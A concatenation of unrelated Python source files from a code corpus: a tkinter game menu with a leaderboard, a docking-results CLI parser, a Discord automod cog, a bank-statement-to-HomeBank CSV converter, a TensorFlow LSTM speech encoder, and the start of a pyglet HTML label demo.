#uwsgi_temp_path {nginx_root}/uwsgi_temp;
access_log {nginx_root}/error.log;
# This should be turned off in a Virtualbox VM, as it can cause some
# interesting issues with data corruption in delivered files.
sendfile off;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
#include /etc/nginx/mime.types;
index index.html index.htm index.php;
log_format main '$remote_addr - $remote_user [$time_local] $status '
'"$request" $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
default_type application/octet-stream;
server {{
# IPv4.
listen {http_port} {default_server};
# IPv6.
listen [::]:{http_port} {default_server};
server_name nginx.{wtf_prefix}.wtf nginx2.{wtf_prefix}.wtf;
root {nginx_webroot};
location / {{
# First attempt to serve request as file, then as directory, then fall
# back to index.html.
try_files $uri $uri/ /index.html;
}}
}}
server {{
listen {http_port};
listen [::]:{http_port};
server_name nginx3.{wtf_prefix}.wtf;
root {nginx_webroot};
location /.well-known/ {{
return 404;
}}
return 301 https://$host$request_uri;
}}
server {{
listen {other_port};
listen [::]:{other_port};
server_name nginx4.{wtf_prefix}.wtf nginx5.{wtf_prefix}.wtf;
}}
server {{
listen {http_port};
listen [::]:{http_port};
listen {https_port} ssl;
listen [::]:{https_port} ssl;
if ($scheme != "https") {{
return 301 https://$host$request_uri;
}}
server_name nginx6.{wtf_prefix}.wtf nginx7.{wtf_prefix}.wtf;
ssl_certificate {cert_path};
ssl_certificate_key {key_path};
}}
}}
'''.format(nginx_root=nginx_root, nginx_webroot=nginx_webroot, user=getpass.getuser(),
http_port=http_port, https_port=https_port, other_port=other_port,
default_server='default_server' if default_server else '', wtf_prefix=wtf_prefix,
key_path=key_path, cert_path=cert_path)
|
nilq/baby-python
|
python
|
from tkinter import *
from tkinter import font
from tkinter import ttk
from importlib import reload
game_loadonce = False
def play():
global game
global menuApp, game_loadonce
menuApp.save_scores("leaderboard.txt")
menuApp.root.destroy()
if game_loadonce == False:
import game
game_loadonce = True
else:
reload(game)
menuApp = _menuApp()
menuApp.fnh_ttl.configure(text="Score: "+str(game.score))
menuApp.getname1()
class _menuApp():
def sortf(self, scr):
i2 = 0
for i in range(len(scr), 0, -1):
if scr[i:i+2] == '- ':
i2 = i
break
i2 += 2
return -int(scr[i2:])
def load_scores(self, fname):
try:
file = open(fname, mode='r')
except FileNotFoundError:
file = open(fname, 'a')
file.close()
return
for line in file.readlines():
line = line.strip()
self.scores.append(line)
self.scores.sort(key=self.sortf)
file.close()
def save_scores(self, fname):
file = open(fname, mode='w')
for line in self.scores:
file.write(line+'\n')
file.close()
def update_scores(self, name=None, score=None):
if name != None and score != None:
msg = name+' - '+str(score)
self.scores.append(msg)
self.scores.sort(key=self.sortf)
self.scr_lst_v.set(value=self.scores)
self.save_scores("leaderboard.txt")
def quit(self):
self.destroyed = True
self.root.quit()
def leaderboard(self, prev_f):
prev_f.place_forget()
self.main.place_forget()
self.ldr_brd.place(x=0, y=0)
def mainmenu(self, prev_f):
prev_f.place_forget()
self.main.place(x=0, y=0)
def getname1(self):
self.main.place_forget()
self.finish.place(x=0, y=0)
def getname2(self):
self.finish.place_forget()
self.main.place(x=0, y=0)
if menuApp.txtname.get() == '':
menuApp.txtname.set('Anonymous')
menuApp.update_scores(menuApp.txtname.get(), game.score)
def __init__(self):
self.rescr = (512, 512)
self.root = Tk()
self.root.title("SPACE ATTXK")
self.root.geometry(str(self.rescr[0]) + 'x' + str(self.rescr[1]))
self.root.resizable(False, False)
self.font1 = font.Font(family='Arial', size=24)
self.font2 = font.Font(family='Arial', size=12)
self.s = ttk.Style()
self.s.configure('TButton', font=self.font2)
self.main = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.main.columnconfigure(0, weight=1)
self.main.columnconfigure(3, weight=1)
self.main.rowconfigure(0, weight=1)
self.main.rowconfigure(6, weight=1)
self.main.grid_propagate(0)
self.main.place(x=0, y=0)
self.title = ttk.Label(
self.main, text="SPACE ATTXCK", font=self.font1, padding=32)
self.title.grid(row=1, column=0, columnspan=4)
self.strt_btn = ttk.Button(self.main, text="Play", command=play)
self.strt_btn.grid(row=2, column=2, sticky=S+E+W)
self.ldr_btn = ttk.Button(
self.main, text="Leaderboard", command=lambda: self.leaderboard(self.main))
self.ldr_btn.grid(row=3, column=2, sticky=N+E+S+W)
self.settings = ttk.Button(
self.main, text="Exit", command=lambda: exit())
self.settings.grid(row=4, column=2, sticky=N+E+W)
ctl_txt = "Controls:\nJump - Space\n Fire - Enter\nEscape - Pause Game"
self.controls = ttk.Label(
self.main, text=ctl_txt, font=self.font2, justify=CENTER, padding=32)
self.controls.grid(row=5, column=2, sticky=N+E+W)
self.scores = []
self.scr_lst_v = StringVar(value=self.scores)
self.load_scores("leaderboard.txt")
self.update_scores()
self.ldr_brd = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.ldr_brd.columnconfigure(0, weight=1)
self.ldr_brd.columnconfigure(3, weight=1)
# self.ldr_brd.rowconfigure(0,weight=1)
self.ldr_brd.grid_propagate(0)
self.ldr_ttl = ttk.Label(
self.ldr_brd, text="Leaderboard", font=self.font1, padding=32, justify=CENTER)
self.ldr_ttl.grid(row=1, column=2)
self.ldr_lst = Listbox(self.ldr_brd, listvariable=self.scr_lst_v,
height=10, selectmode='browse', font=self.font2)
self.ldr_lst.grid(row=2, column=2, padx=16, pady=16)
self.ldr_exit = ttk.Button(
self.ldr_brd, text="Main Menu", command=lambda: self.mainmenu(self.ldr_brd))
self.ldr_exit.grid(row=3, column=2)
self.finish = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.finish.rowconfigure(0, weight=1)
self.finish.rowconfigure(5, weight=1)
self.finish.columnconfigure(1, weight=1)
self.finish.columnconfigure(3, weight=3)
self.finish.grid_propagate(0)
self.txtname = StringVar()
self.fnh_ttl = ttk.Label(self.finish, text="",
font=self.font1, justify=CENTER)
self.fnh_ttl.grid(row=1, column=2, padx=16, pady=16)
self.fnh_lbl1 = ttk.Label(
self.finish, text="Enter name:", font=self.font2, justify=CENTER)
self.fnh_lbl1.grid(row=3, column=1, padx=16)
self.fnh_txtin = ttk.Entry(
self.finish, font=self.font2, justify=CENTER, textvariable=self.txtname)
self.fnh_txtin.grid(row=3, column=2)
self.fnh_btn = ttk.Button(
self.finish, text="OK", command=self.getname2)
self.fnh_btn.grid(row=4, column=2, padx=16, pady=16)
menuApp = _menuApp()
menuApp.root.mainloop()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import getopt
import os
import sys
import re
from .debug import Debug
from .debug import BColors
from subprocess import Popen, PIPE
from .debug import Debug
class InputParams(object):
def __init__(self, cfg, argv):
self.PROG_OPT_RE = re.compile(r'^([A-Z\d]+)[_-](?:([A-Z\d]+)[_-])?')
self.cfg = cfg
self.argv = argv
self.TAG = "InputPArams"
self.color = BColors.GREEN
self.get_input_params()
def get_input_params(self):
if len(self.argv) == 1:
self.cfg.print_format_help("Mandatory options:", "")
self.cfg.print_format_help("-i", "result folder genereted by MetaScreener")
self.cfg.print_format_help("-p", "Original target")
self.cfg.print_format_help("--pdb", "Original target in pdb format")
self.cfg.print_format_help("-l", "Original query")
print("")
self.cfg.print_format_help("Optional options:", "")
self.cfg.print_format_help("--cores", "Maximum number of cores; Use 0 for autodetect; Default: 1")
self.cfg.print_format_help("--profile", "webBD STANDARD_BD STANDARD_VS")
self.cfg.print_format_help("--prog", "Software")
self.cfg.print_format_help("--opt", "opt")
self.cfg.print_format_help("-c", "cut-off of energies; Default: 0")
self.cfg.print_format_help("-z", "Clustering only for BD; Deafult: y")
self.cfg.print_format_help("-s", "Generate poseview; Deafult: y")
self.cfg.print_format_help("-t", "Generate plip interactions; Deafult: y")
self.cfg.print_format_help("-f", "If folder exits don't overwrite; Deafult: y")
self.cfg.print_format_help("-a", "Generate pymol sessions with plip;"
"Deafult: n")
self.cfg.print_format_help("--rb", "Number of files saved as bestScore in VS. Default(50)")
self.cfg.print_format_help("--rf", "Number of files saved in VS. Default (500)")
self.cfg.print_format_help("-b", "Chain of residues split by ':', type cad_res_num, "
" For example A_TYR_385:A_VAL_434:A_VAL_5")
self.cfg.print_format_help("-e", "ONLY BD; calcula la distancia entre el centro del ligando original y el"
" centro del ligando "
"de docking; Deafult: n")
self.cfg.print_format_help("-d", "Debug level; Deafult: 0 (off)")
print("\nUsage: %s -i input Docking -p proteinFile -l ligFile -c min Score -s poseview y -z clusterizado y"
% sys.argv[0] + "\n")
exit()
print("Using {} core{} for procesing results.".format(self.cfg.cores, 's' if self.cfg.cores > 1 else ''))
# Read command line args
myopts, args = getopt.getopt(self.argv[1:], "i:p:l:c:s:z:t:d:k:f:a:b:r:e:",
["cores=", "prog=", "opt=", "profile=", "flex", "rb=", "rf=", "pdb="])
for o, a in myopts:
if o == '--profile':
self.cfg.use_profile = a.upper()
if self.cfg.use_profile:
self.cfg.set_profile_cfg(self.cfg.use_profile)
for o, a in myopts:
if o == '-i':
self.cfg.file_input = os.path.realpath(a if a.endswith('/') else "{}/".format(a))
elif o == '-p':
self.cfg.file_target = a
elif o == '--pdb':
self.cfg.file_target_pdb = a
elif o == '-c':
self.cfg.engCorte = float(a)
elif o == '-l':
self.cfg.file_query = a
elif o == '-s':
self.cfg.poseview = a
elif o == '-z':
self.cfg.clusterizado = a
elif o == '-d':
self.cfg.mode_debug = a
elif o == '-a':
self.cfg.plip = a
elif o == '-f':
self.cfg.createFolder = a
elif o == '-e':
self.cfg.distanceLigs = a
elif o == '-b':
aux = a.split(":")
for i in aux:
self.cfg.resnPoseviewDetct.append(i)
elif o == '--flex':
self.cfg.flexible = True
elif o == '--cores':
self.cfg.cores = int(a)
max_cores = cpu_count()
if self.cfg.cores == 0 or self.cfg.cores > max_cores:
self.cfg.cores = max_cores
elif self.cfg.cores < 0:
self.cfg.cores = 1
elif o == '--profile':
self.cfg.use_profile = a.upper()
elif o == '--prog':
self.cfg.programa = a.upper()
elif o == '--opt':
if not self.cfg.use_profile:
self.cfg.opcion = a.upper()
elif o == '--rb':
self.cfg.resultados_best_score = int(a)
elif o == '--rf':
self.cfg.resultados_ficheros = int(a)
else:
print("\nUsage: %s -i input Docking -p proteinFile -l ligFile -c min Score -s poseview y "
"-z clusterizado y -t inteacciones y -d debug [0-10]" % sys.argv[0] + "\n")
exit()
self.cfg.debug = Debug(self.cfg.mode_debug)
self.cfg.file_target = os.path.realpath(self.cfg.file_target)
if self.cfg.file_target_pdb:
self.cfg.file_target_pdb = os.path.realpath(self.cfg.file_target_pdb)
self.cfg.file_query = os.path.realpath(self.cfg.file_query)
self.cfg.file_input = os.path.realpath(self.cfg.file_input)
# Get compounds names and input path
self.cfg.extract_names()
if not self.cfg.file_target or not os.path.exists(self.cfg.file_target):
print("Target(s) not indicated(s), aborting.")
exit()
elif not self.cfg.file_query or not os.path.exists(self.cfg.file_query):
print("Query(s) not found, aborting.")
exit()
elif not self.cfg.file_input or not os.path.exists(self.cfg.file_input):
print("Path of docking results not found, aborting.")
exit()
self.cfg.print_format("Input files:", "", "")
self.cfg.print_format("", "Query: ", self.cfg.file_target)
self.cfg.print_format("", "Ligands: ", self.cfg.file_query)
self.cfg.print_format("", "Directory MetaScreener: ", self.cfg.file_input + "/")
#
# Test folders
#
self.cfg.SHUTTLEMOL_DIRS = self.cfg.perfiles.get_folders()
self.cfg.OUTPUT_DIRS = self.cfg.perfiles.get_out_folders()
self.cfg.OUTPUT_GRAPHS = self.cfg.perfiles.get_files_out()
self.cfg.ext_query = os.path.splitext(self.cfg.file_query)[1].strip()
self.cfg.ext_target = os.path.splitext(self.cfg.file_target)[1].strip()
comando = ("find " + self.cfg.file_input + "/" + self.cfg.SHUTTLEMOL_DIRS[
'folderMolec'] + "/ ")
aux = self.cfg.execute(self.TAG, comando)
aux = aux.split("\n")
if os.path.isdir(aux[0]):
del aux[0]
self.cfg.extLigand = str(os.path.splitext(aux[0])[1]).strip()
self.cfg.print_format("", "Ext Prot: ", self.cfg.ext_target)
self.cfg.print_format("", "Ext Lig: ", self.cfg.ext_query)
if self.cfg.mode_debug:
debug = Debug(self.cfg.mode_debug)
for i in self.cfg.SHUTTLEMOL_DIRS:
debug.show(self.TAG + " metascreener Dirs: " + i, self.color)
for i in self.cfg.OUTPUT_DIRS:
debug.show(self.TAG + " Out Dirs: " + i + " " + self.cfg.OUTPUT_DIRS[i], self.color)
for i in self.cfg.OUTPUT_GRAPHS:
debug.show(self.TAG + " Out Dirs: " + i + " " + self.cfg.OUTPUT_GRAPHS[i]['outPut'], self.color)
if not self.cfg.programa or not self.cfg.opcion:
match = self.PROG_OPT_RE.match(self.cfg.nameEntrada)
if match and len(match.group()) > 1:
self.cfg.programa = match.group(2).strip()
self.cfg.opcion = match.group(1).strip()
else:
print("The program or the option could not be determined, aborting ")
exit()
self.cfg.print_format("\nTest data:", "", "")
self.cfg.print_format("", "Software: ", self.cfg.programa)
self.cfg.print_format("", "Technique: ", self.cfg.opcion)
self.cfg.print_format("", "Molecules:", str(len(aux)) + "\n")
|
nilq/baby-python
|
python
|
"""Test."""
import unittest
class TestX(unittest.TestCase):
"""Tests."""
def test_f(self):
"""Test."""
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
import discord
from redbot.core import Config, commands, checks
class Automod(commands.Cog):
"""Automoderation commands"""
def __init__(self):
self.config = Config.get_conf(self, identifier=1234567890)
watching = list()
self.config.init_custom("ChannelsWatched", 1)
self.config.register_custom("ChannelsWatched", **watching)
blacklisted_words = list()
self.config.init_custom("BlacklistedWords", 1)
self.config.register_custom("BlacklistedWords", **blacklisted_words)
@commands.group(name='automod')
async def automod(self, ctx):
pass
@automod.command(name='watch')
@commands.admin()
async def watch(self, ctx, channel: discord.TextChannel):
await self.config.custom("ChannelsWatched").watching().append(channel)
await ctx.send(f'Watching {channel.name}')
@automod.command(name='unwatch')
@commands.admin()
async def unwatch(self, ctx, channel: discord.TextChannel):
watching = await self.config.custom("ChannelsWatched").watching()
del watching[channel]
await ctx.send(f'Stopped watching {channel.name}')
@automod.command(name='block')
@commands.admin()
async def watch(self, ctx, word: str):
await self.config.custom("BlacklistedWords").blacklisted_words.append(word)
await ctx.send(f'Blocked `{word}`')
@automod.command(name='unblock')
@commands.admin()
async def unwatch(self, ctx, word: str):
blacklisted = await self.config.custom("BlacklistedWords").blacklisted_words()
del blacklisted[word]
await ctx.send(f'Unblocked `{word}`')
@automod.command(name='listblocked')
async def listblocked(self, ctx):
blacklisted = await self.config.custom("BlacklistedWords").blacklisted_words()
await ctx.send(f'```{str(blacklisted)}```')
@commands.Cog.listener()
async def on_message(self, message):
watching_channels = await self.config.custom("ChannelsWatched").watching()
blacklisted_words = await self.config.custom("BlacklistedWords").blacklisted_words()
if not message.channel in watching_channels:
return
for word in blacklisted_words:
if message.content in word:
await message.delete()
|
nilq/baby-python
|
python
|
#! /user/bin/env python3
import argparse
import xlrd
from datetime import datetime
import pandas as pd
import os
import shutil
import configparser
config = configparser.ConfigParser()
config.read("config.ini")
unixFilesPath = os.getcwd() + config["FilePaths"]["unixFilesPath"]
unixConvertedPath = os.getcwd() + config["FilePaths"]["unixConvertedPath"]
windowsFilesPath = os.getcwd() + config["FilePaths"]["windowsFilesPath"]
windowsConvertedPath = os.getcwd() + config["FilePaths"]["windowsConvertedPath"]
user = config["User"]["username"]
homeBankCols = config["HomeBank"]["homeBankCols"].split(sep=",")
amexHeaders = config["CSVHeaders"]["amexHeaders"].split(sep=",")
boaCAHeaders = config["CSVHeaders"]["boaCAHeaders"].split(sep=",")
boaCCHeaders = config["CSVHeaders"]["boaCCHeaders"].split(sep=",")
earnestHeaders = config["CSVHeaders"]["earnestHeaders"].split(sep=",")
vanguardRothHeaders = config["CSVHeaders"]["vanguardRothHeaders"].split(sep=",")
vanguard401KHeaders = config["CSVHeaders"]["vanguard401KHeaders"].split(sep=",")
venmoHeaders = config["CSVHeaders"]["venmoHeaders"].split(sep=",")
paypalHeaders = config["CSVHeaders"]["paypalHeaders"].split(sep=",")
def amexCCConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == amexHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notna:
data.append([row["Date"], None, None, row["Description"], None,
-1*row["Amount"],
None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/amexHomeBank.csv", index=False, sep=";")
def boaCAConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=5)
if all(inputDataDict.columns == boaCAHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
data.append([row["Date"], None, None, row["Description"],
None, row["Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/boaCAHomeBank.csv", index=False, sep=";")
def boaCCConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == boaCCHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
data.append([row["Posted Date"], None, row["Reference Number"], row["Payee"],
None, row["Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/boaCCHomeBank.csv", index=False, sep=";")
def earnestConversion(filename):
inputDataDict = pd.read_html(io=filename)[0]
try:
if all(inputDataDict.columns == earnestHeaders):
inputDataDict = pd.read_html(io=filename)[0].to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
# Just the loan
data.append([row["Date"], None, None, user, None,
row["Total"][2:],
"Loan Payment", None])
# Just the interest
data.append([row["Date"], None, None, "Earnest", None,
"-" + row["Interest"][2:],
"Loan Interest", None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/earnestHomeBank.csv", index=False, sep=";")
def vanguardRothConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=3)
inputDataDict = inputDataDict.loc[:, ~inputDataDict.columns.str.contains('^Unnamed')]
if all(inputDataDict.columns == vanguardRothHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if vanguardRothLogic(row["Transaction Type"]):
data.append([row["Settlement Date"], 0, row["Transaction Description"], "Vanguard",
None, row["Principal Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/vanguardRothHomeBank.csv", index=False, sep=";")
def vanguardRothLogic(rowType):
if rowType == "Dividend":
return True
elif rowType == "Contribution":
return True
elif rowType == "Capital gain (LT)":
return True
elif rowType == "Capital gain (ST)":
return True
else:
return False
def vanguard401KConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=16)
inputDataDict = inputDataDict.loc[:, ~inputDataDict.columns.str.contains('^Unnamed')]
if all(inputDataDict.columns == vanguard401KHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if vanguard401KLogic(row["Transaction Description"]):
data.append([
row["Run Date"], None, row["Transaction Description"],
"Vanguard", None, row["Dollar Amount"], None, row["Investment Name"]
])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/vanguard401KHomeBank.csv", index=False, sep=";")
def vanguard401KLogic(rowType):
if rowType == "Plan Contribution":
return True
elif rowType == "Dividends on Equity Investments":
return True
else:
return False
def venmoConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=0)
inputDataDict["Datetime"] = pd.to_datetime(inputDataDict["Datetime"],format="%Y-%m-%dT%H:%M:%S")
if all(inputDataDict.columns == venmoHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notnull(row["Amount (total)"]):
data.append([
row["Datetime"].strftime("%m/%d/%Y"),
None, row["Note"],
venmoLogic(row),
"Venmo " + row["Type"],
row["Amount (total)"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/venmoHomeBank.csv", index=False, sep=";")
def paypalConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == paypalHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notnull(row["Amount"]):
data.append([
row["Date"],
None, row["Type"],
row["Name"] if pd.notnull(
row["Name"]) else paypalLogic(row["Type"]),
None, row["Amount"], None, None])
if len(data) == 0:
raise Exception()
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/paypalHomeBank.csv", index=False, sep=";")
def paypalLogic(type_name):
if type_name == "General Credit Card Deposit":
return "Paypal"
else:
return None
def init():
try:
os.mkdir("files")
os.mkdir("convertedfiles")
print("Init success")
except:
print("Init failed")
def runAll():
print("Running all possible conversions")
cwd = ""
try:
if os.name == "nt":
fileList = os.listdir(windowsFilesPath)
cwd = windowsFilesPath + "\\"
else:
fileList = os.listdir(unixFilesPath)
cwd = unixFilesPath + "/"
except:
raise Exception
for file in fileList:
filePath = cwd + file
try:
amexCCConversion(filePath)
print(file + " is amexCC")
except:
print(file + " is not amexCC")
try:
boaCAConversion(filePath)
print(file + " is boaCA")
except:
print(file + " is not boaCA")
try:
boaCCConversion(filePath)
print(file + " is boaCC")
except:
print(file + " is not boaCC")
try:
earnestConversion(filePath)
print(file + " is earnest")
except:
print(file + " is not earnest")
try:
vanguardRothConversion(filePath)
print(file + " is vanguardRoth")
except:
print(file + " is not vanguardRoth")
try:
vanguard401KConversion(filePath)
print(file + " is vanguard401k")
except:
print(file + " is not vanguard401k")
try:
venmoConversion(filePath)
print(file + " is venmo")
except:
print(file + " is not venmo")
try:
paypalConversion(filePath)
print(file + " is paypal")
except:
print(file + " is not paypal")
def clean():
try:
if os.name == "nt":
shutil.rmtree(windowsFilesPath)
shutil.rmtree(windowsConvertedPath)
else:
shutil.rmtree(unixFilesPath)
shutil.rmtree(unixConvertedPath)
print("Directories have been removed")
except:
print("Directories were not cleaned")
def venmoLogic(row):
if row["Type"] == "Charge":
return row["To"]
elif row["Type"] == "Standard Transfer":
return user
elif row["Type"] == "Payment":
return row["From"]
else:
return None
def main():
parser1 = argparse.ArgumentParser(add_help=False,
description="Convert data files from online banking sites to Homebank compatible CSV formats. Default is to run all")
parser1.add_argument("--clean", action="store_true",
help="deletes the \'convertedfiles\' and \'files\' directories and its contents")
parser1.add_argument("--init", action="store_true",
help="initialize the directories by creating the \'convertedfiles\' and \'files\' directories ")
parser2 = argparse.ArgumentParser(parents=[parser1])
group = parser2.add_mutually_exclusive_group()
group.add_argument("--amex", nargs=1,
help="convert an American Express credit card account CSV file",)
group.add_argument("--boaCA", nargs=1,
help="convert a Bank of America checking account CSV file")
group.add_argument("--boaCC", nargs=1,
help="convert a Bank of America credit card CSV file")
group.add_argument("--earnest", nargs=1,
help="convert an Earnest xlsx file")
group.add_argument("--venmo", nargs=1,
help="convert a Venmo csv file")
group.add_argument("--vRoth", nargs=1,
help="convert a Vanguard Roth csv file")
group.add_argument("--v401k", nargs=1,
help="convert a Vanguard 401K csv file")
group.add_argument("--paypal", nargs=1,
help="convert a Paypal csv file")
args = parser2.parse_args()
if args.clean:
clean()
elif args.init:
init()
elif args.amex:
amexCCConversion(args.amex[0])
print("AMEX file converted. Output file: amexHomeBank.csv")
elif args.boaCA:
boaCAConversion(args.boaCA[0])
print("BOA CA file converted. Output file: boaHomeBank.csv")
elif args.boaCC:
boaCCConversion(args.boaCC[0])
print("BOA CC file converted. Output file: boaHomeBank.csv")
elif args.earnest:
earnestConversion(args.earnest[0])
print("Earnest file converted. Output file: earnestHomeBank.csv")
elif args.venmo:
venmoConversion(args.venmo[0])
print("Venmo file converted. Output file: venmoHomeBank.csv")
elif args.vRoth:
vanguardRothConversion(args.vRoth[0])
print("Vanguard Roth file converted. Output file: vanguardRothHomeBank.csv")
elif args.v401k:
vanguard401KConversion(args.v401k[0])
print("Vanguard 401k file converted. Output file: vanguard401kHomeBank.csv")
elif args.paypal:
paypalConversion(args.paypal[0])
print("Paypal file converted. Output file: paypalHomeBank.csv")
else:
runAll()
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
#-*- coding:utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=import-error, too-few-public-methods, too-many-locals
# pylint: disable=too-many-arguments, too-many-instance-attributes, invalid-name
"""
lstm_encoder.py: the implementation of lstm ctc
"""
__author__ = "Kyungmin Lee"
__email__ = "sephiroce@snu.ac.kr"
import math
import tensorflow as tf
import tfsr.helper.model_helper as mh
from tfsr.model.sequence_router import CapsulationLayer
class LstmEncoder(tf.keras.Model): #pylint: disable=too-many-ancestors
"""
An implementation of LSTM based speech encoders.
"""
def get_config(self):
pass
def __init__(self, config, vocab_n):
super().__init__()
self.mask = tf.keras.layers.Lambda(mh.feat_mask2, name="pad_mask")
num_layers = config.model_encoder_num
d_model = config.model_dimension
input_dropout = config.train_inp_dropout
inner_dropout = config.train_inn_dropout
init = config.model_initializer
self.d_model = d_model
self.num_layers = num_layers
if config.model_type.lower() == "blstm":
self.enc_layers = [tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(
d_model, return_sequences=True, kernel_initializer=mh.get_init(
init)), merge_mode="ave") for _ in range(num_layers)]
else:
self.enc_layers = \
[tf.keras.layers.LSTM(d_model, return_sequences=True,
kernel_initializer=mh.get_init(init))
for _ in range(num_layers)]
self.layernorms = [tf.keras.layers.LayerNormalization(epsilon=1e-6)
for _ in range(num_layers)]
self.dropouts = [tf.keras.layers.Dropout(rate=inner_dropout)
for _ in range(num_layers)]
self.ln = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.mask_layer = tf.keras.layers.Masking(mask_value=0.0)
self.input_dropout = tf.keras.layers.Dropout(rate=input_dropout)
self.proj = tf.keras.layers.Dense(
vocab_n, kernel_initializer=mh.get_init(init), use_bias=False)
kernel_size = 3
self.stride = stride = config.model_conv_stride
self.cnn_n = cnn_n = config.model_conv_layer_num
self.feat_dim = math.ceil(config.feat_dim / (stride ** cnn_n))
self.nfilt = nfilt = config.model_conv_filter_num
self.conv = CapsulationLayer(cnn_n, nfilt, kernel_size, self.stride, init,
name="conv_feat") \
if config.model_lstm_is_cnnfe else None
self.in_len_div = stride ** cnn_n if config.model_lstm_is_cnnfe else 1
def call(self, embeddings, **kwargs):
# pylint: disable=arguments-differ
inp_len = kwargs["input_lengths"]
training = kwargs["training"]
if self.conv is not None:
embeddings, batch, seq_len = self.conv(embeddings, input_lengths=inp_len)
embeddings = tf.reshape(embeddings,
[batch, seq_len, self.feat_dim * self.nfilt],
name="reshape_conv")
embeddings = self.input_dropout(embeddings, training=training)
for idx, enc_layer in enumerate(self.enc_layers):
embeddings = enc_layer(embeddings)
embeddings = self.layernorms[idx](embeddings)
embeddings = self.dropouts[idx](embeddings, training=training)
embeddings = self.proj(embeddings)
embeddings = self.mask([embeddings, inp_len, self.in_len_div])
embeddings = self.mask_layer(embeddings)
return self.ln(embeddings)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''A simple demonstration of the HTMLLabel class, as it might be used on a
help or introductory screen.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import os
import pyglet
html = '''
<h1>HTML labels in pyglet</h1>
<p align="center"><img src="pyglet.png" /></p>
<p>HTML labels are a simple way to add formatted text to your application.
